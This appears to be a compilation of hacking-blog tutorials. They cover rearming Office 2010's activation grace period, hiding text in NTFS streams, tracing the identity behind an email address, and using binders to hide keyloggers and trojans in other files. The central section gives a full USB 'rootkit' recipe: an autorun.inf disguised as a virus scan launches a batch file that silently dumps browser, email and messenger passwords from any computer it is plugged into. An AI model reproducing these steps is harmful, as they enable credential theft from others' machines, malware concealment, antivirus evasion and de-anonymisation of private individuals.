How to Rearm and Extend Office 2010 Activation Grace Period for Free 180 Days


Microsoft has implemented product activation scheme named Office Protection Platformm (OPP) that similar with Windows Product Activation (WPA) and Software Protection Platform (SPP) for Windows Vista and Windows Activation Technologies (WAT) Windows 7 in Microsoft Office 2010, where all copy of Office 2010 installed has to be activated, with 30 days activation grace period. There is no more “workaround” to use volume edition of Office with volume license product key (VLK) to bypass requirement to activate Office productivity suite.

Microsoft has released Office 2010 Technical Preview version to invited beta testers who registered for Office 2010 Technical Preview program. Several builds of Office 2010 such as Office 2010 Technical Preview and Office 2010 Mondo (Ultimate) Technical Preview have been leaked to Internet.
The TP version of Office 2010 requires activation too. For people who is not accepted or invited into the official Office 2010 Technical Preview program, but has installed Office 2010, and been persistently warned that this copy of Microsoft Office is not activated with few days left to activate, Office 2010 (probably including the final RTM version when released) has built-in capability for user to rearm and extend the activation grace period for another additional 30 days for up to generous 5 (five) times, in a feature similar to Windows Vista rearm or Windows 7 rearm, allowing up to 180 days of free usage of Office 2010.
How to Rearm Microsoft Office 2010 to Extend Activation Grace Period for Another 30 Days
  1. Go to Control Panel -> Administrator Tools -> Services, or type services.msc in Start Search.
  2. Stop the Office Software Protection service.
  3. Open a Command Prompt with elevated privileges.
  4. Run the OSPPRUN.exe with the following command:
%SystemDrive%:\Windows\System32\OSPPRUN.exe
Where %SystemDrive% is normally C: or other drive letter that Windows is installed on.
  1. A new prompt will come out. Enter the following commands which precede with > one by one, each follows by Enter:
> Initialize
> Open
> GetInstalledSkuIds
Above command will return the following result, where the application ID number 0 represents AppID for Office 2010:
0. 128a057a-7e95-4063-b296-c54c5f3d3f3a
1. 26adec89-edf3-4adc-a3fc-c865f1a9f71f
OK.
> GetInstalledAppIds 128a057a-7e95-4063-b296-c54c5f3d3f3a
Above command will return result similar to below:
0. 59a52881-a989-479d-af46-f275c6370663
OK.
> GetLicensingStatus 59a52881-a989-479d-af46-f275c6370663 128a057a-7e95-4063-b296-c54c5f3d3f3a
Above command will return the following output, where dwGraceTime is a DWORD value that holds the grace period before the software will stop working and require activation:
SkuId = 128a057a-7e95-4063-b296-c54c5f3d3f3a
eStatus = SL_LICENSING_STATUS_IN_GRACE_PERIOD
dwGraceTime = 1D 23:37
dwTotalGraceDays = 30 days
hrReason = 4004F00C
qwExpiration = 2010/10/31
OK.
  1. In the same prompt, run the following commands (which basically set AppID and SkuID for Office 2010 to enable free 30 days usage before activation), each follows by Enter, to rearm Microsoft Office 2010 to reset, prolong and extend activation grace period for additional 30 days:
> Rearm 59a52881-a989-479d-af46-f275c6370663 128a057a-7e95-4063-b296-c54c5f3d3f3a 1
OK.
Note: Mostly the IDs are the same for similar Office 2010 installation. If your APP ID and/or SKU ID is different, please change accordingly.
> Close
> Initialize
> Open
Note: “Close” command is import to stop the Office Software Protection service (which can also be stopped via Service.msc interface) after rearming and before reinitialize of license data (The activation countdown timer or license requires a service reinitialization or restart to update), or else “Unlicensed” license status with timer at 0 error may occur.
  1. To verify that the Office 2010 rearm is successful, and to check how many days left in activation grace period before activation is required, use the following command, follows by Enter (replace IDs if different):
> GetLicensingStatus 59a52881-a989-479d-af46-f275c6370663 128a057a-7e95-4063-b296-c54c5f3d3f3a
SkuId = 128a057a-7e95-4063-b296-c54c5f3d3f3a
eStatus = SL_LICENSING_STATUS_IN_GRACE_PERIOD
dwGraceTime = 29D 23:37
dwTotalGraceDays = 30 days
hrReason = 4004F00C
qwExpiration = 2010/10/31
dwGraceTime will show the remaining time available to use Office 2010 for free without activation.
  1. Quit the OSPPRUN prompt with following command, follows by Enter:
> Quit
Tip 1: To check how many rearms that is remaining, use the following command:
> GetApplicationInformation 59a52881-a989-479d-af46-f275c6370663 RemainingRearmCount
(DWORD, []) 59a52881-a989-479d-af46-f275c6370663 = 4
OK.
After one rearm of Office 2010, 4 rearms is still possible, to extend the free (evaluation or trial) free usage of Office 2010 to 180 days (6 months or half a year), taking into account the initial 30 days activation free period before first ream is performed.
Tip 2: To check and show how many rearms of Office 2010 have been performed, use the following command:
> GetApplicationInformation 59a52881-a989-479d-af46-f275c6370663 RearmCount
(DWORD, []) 59a52881-a989-479d-af46-f275c6370663 = 1
OK.

How to Sniff Passwords Using USB Drive


As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to sniff passwords from any computer. We need the following tools to create our rootkit.


MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.

Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.

Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.
IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0
 
Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…
 
PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.

Here is a step by step procedre to create the password hacking toolkit.

NOTE: You must temporarily disable your antivirus before following these steps.
 
1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.
ie: Copy the files – mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.
 
2. Create a new Notepad and write the following text into it
 
[autorun]

open=launch.bat

ACTION= Perform a Virus Scan

 
save the Notepad and rename it from
New Text Document.txt to autorun.inf

Now copy the autorun.inf file onto your USB pendrive.
 
3. Create another Notepad and write the following text onto it.
 
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt

save the Notepad and rename it from
New Text Document.txt to launch.bat
 
Copy the launch.bat file also to your USB drive.

Now your rootkit is ready and you are all set to sniff the passwords. You can use this pendrive on on any computer to sniff the stored passwords. Just follow these steps

1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).
2. In the pop-up window, select the first option (Perform a Virus Scan).
3. Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.
4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.

This hack works on Windows 2000, XP and Vista

NOTE: This procedure will only recover the stored passwords (if any) on the Computer.

Find the Person Behind the Email Address

You get an email from a person with whom you have never interacted before and therefore, before you reply to that message, you would like to know something more about him or her. How do you do this without directly asking the other person?

Web search engines are obviously the most popular place for performing reverse email lookups but if the person you’re trying to research doesn’t have a website or has never interacted with his email address on public forums before, Google will probably be of little help.

No worries, here are few tips and online services that may still help you uncover the identity of that unknown email sender.

#1. Find the sender’s location
Location of Email Sender

Open the header of the email message and look for lines that say “Received: from” followed by an IP address in square brackets. If there are multiple entries, use the IP address mentioned in the last entry.

Now paste the IP address in this trace route tool and you should get a fairly good idea about the location of the email sender.
 
#2. Reverse email search with Facebook
Facebook email search

Facebook has 450 million users worldwide and there’s a high probability that the sender may also have a profile on Facebook.

Unlike LinkedIn and most other social networks, Facebook lets you search users by email address so that should make your job simpler. Just paste the email address of the sender into the Facebook search box and you’ll immediately know if a matching profile exists in the network.

If you are able to locate that person on Facebook, download his profile picture and then upload it to TinEye – it’s a reverse image search engine so you can locate his other social profiles where he may have used the same picture.
 
#3. Check all the other Social Networks
Search Social Networks

You can use a service like Knowem to quickly determine if a profile with a particular username exists in any of the social networks.

If the email address of the send is something like green_peas@hotmail.com, there’s a probably that he or she may have created accounts of some other social network using the same alias “green_peas” – put that in knowem.com to confirm.
 
#4. People Search
Reverse Email Search

Finally, if nothing works, you should try a people search service like Pipl and Spokeo – both services let you perform reverse email lookups but Spokeo has a more comprehensive database than Pipl.
Other than regular web documents, Spoke also scans social networks and even the whois information of domain names to find any bit of information associated with an email address. However, some of the results returned by Spokeo are only available to subscribers.

Hide TEXT in Notepad

A Superb Trick To Hide Text In Notepad

Here is a small trick to hide text inside your windows default text editor i.e Notepad using command prompt, but this trick works only on NTFS file system.


Steps to hide text in a Notepad

1. Open your command prompt Start-->Run and Type cmd

2. Move to folder where you want to save your file.
 
3. Type the below code in your command prompt

notepad filename.txt:hidden

4. Write some data and save(Ctrl+S) the file.

5. Browse to the file location and Open filename.txt you cannot see any data in the file.

6. To retrieve the hidden data open command prompt and type the same command.

notepad filename.txt:hidden

Hide Keyloggers and Trojans with Binders

You would have probably heard that never run a .exe file if you are not confirmed about the authenticity of the person who send you that particular file, The reason why you might have heard that because Trojans, Keylogger, Spywares and Adwares use .exe format by default


So what do you think are you completely safe that you run untrusted MP3,JPEG files?

The answer is no, Its because you never know that virus has came with which format, It can take any format, It could be in JPEG, It could be in MP3 and it could be in almost any Format, So in this article I will tell you how hackers hide Keyloggers,Trojans and other harmful viruses in other files

 What is a Binder?

 A Binder is a software used to bind or combine to or more files under one name and extension, The files to be binded can have any extension or icon, Its all up to you and you have the choice to select the name, icon and various attributes of binded file, The Binded files can be even worse when they are crypted, because Bintext would not be able to find it and at the same time it could also bypass antivirus detection then you are almost guaranteed to be infected


Popular Binders

Here are some of the popular binders used by hackers to hide keyloggers and Trojans:

Simple Binder



Simple binder is one of my favorite binders of all time, I give thumbs up to the maker "Nathan", Its so easy to use and even a script kiddie can easily use it to bind keylogger or backdoors with other files


Weekend Binder


Weekend Binder can be used to bind two or more files under one extension and icon, If the binded file contains an application, the application also runs along with the actual binded files .


How to detect Crypted Binded files?



As I told you before that if a trojan or keylogger is binded with a file and it's crypted in order to bypass antivirus detection then its very difficult to detect it, However there is a great piece of software called resource hacker which is really effective when it comes to keylogger protection, It detects whether the file is binded or not.

Credits:rafayhackingarticles.blogspot